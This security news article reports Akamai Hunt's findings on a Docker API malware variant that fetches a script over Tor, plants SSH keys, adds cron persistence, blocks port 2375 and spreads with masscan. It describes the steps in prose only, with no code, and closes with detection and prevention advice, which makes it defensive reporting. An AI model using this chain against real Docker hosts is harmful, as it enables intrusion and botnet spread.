Ddos 
The Akamai Hunt Team has discovered a new strain of malware targeting exposed Docker APIs. Unlike earlier versions focused on cryptomining, this variant introduces expanded infection capabilities, including persistence mechanisms, port blocking, and potential groundwork for a distributed botnet.
The malware first came to light in June 2025, when Trend Micro reported a strain that exploited misconfigured Docker APIs to deploy a cryptominer hidden behind Tor. Attackers executed Base64-encoded payloads within new containers, modified SSH configurations for persistence, and installed tools like masscan and torsocks before launching an XMRig miner.
But by August 2025, Akamai researchers observed a new variant with a shift in strategy. As they explain, “The binary is also different; the variant discovered by Akamai Hunt doesn’t drop a cryptominer but instead drops a file containing other previously used tools along with infection capabilities beyond those of the original strain.”
The new strain executes through an HTTP request to Docker APIs that launches a container based on the Alpine image. Within it, a Base64-decoded script prepares the environment, installs Tor, and retrieves a docker-init.sh script from a Tor hidden service.
Akamai notes: “This script has two stages: Stage 1 prepares the environment by installing curl and Tor; Stage 2 fetches docker-init.sh from a Tor domain.”
The script modifies /root/.ssh/authorized_keys to add the attacker’s public key, establishes persistence with cron jobs, and installs scanning utilities. Most notably, it blocks port 2375 (Docker API) on the host, denying other attackers access — effectively “owning” the victim system for exclusive use.
The downloaded Go-based binary (dubbed dockerd) drops additional tools and runs masscan to search for other Docker instances with exposed APIs. If found, it repeats the infection cycle, propagating the malware across new hosts.
Interestingly, the binary also contains dormant modules for Telnet (port 23) and Chromium remote debugging (port 9222). While these routines aren’t yet active, they hint at future expansion. “Some of the underlying mechanisms lead us to believe this variant is an initial version of a complex botnet, but we have not found a complete version of it so far,” the Hunt Team warns.
The Telnet module uses default router credentials to gain access, sending successful logins to a remote webhook. If the login uses root, the malware assumes it has hit a honeypot — a clever counter-surveillance measure.
Meanwhile, the Chromium module leverages the chromedp Go library to attach to exposed debugging ports. While Akamai did not observe advanced exploitation here, the technique could be expanded to steal cookies, hijack sessions, or exfiltrate sensitive browser data.
The Akamai Hunt Team highlights several detection strategies:
- Monitor for containers that immediately install packages (apt, yum) and fetch scripts via curl or wget.
- Watch for new connections to ports 2375, 23, and 9222, as well as scanning activity with masscan.
- Track Base64-encoded commands executed inside Docker containers.
- Check for suspicious crontab modifications or new SSH keys under /root/.ssh/authorized_keys.
For prevention, the report advises strict network segmentation, limiting Docker API exposure, securing Chrome debugger ports to trusted IPs, and enforcing strong password rotation on all devices.
Related Posts:
- OpenAI Expands Beyond Microsoft: Google Cloud Joins Forces to Power ChatGPT and AI Growth
- Tor Meets Docker: Sophisticated Crypto-Mining Campaign Hijacks Misconfigured APIs
- Critical Docker Desktop Vulnerability Exposes Host Systems to Container Abuse
- Tor Network Thwarts IP Spoofing Attack
- Log4j Campaign Exploited to Deploy XMRig Cryptominer
Donate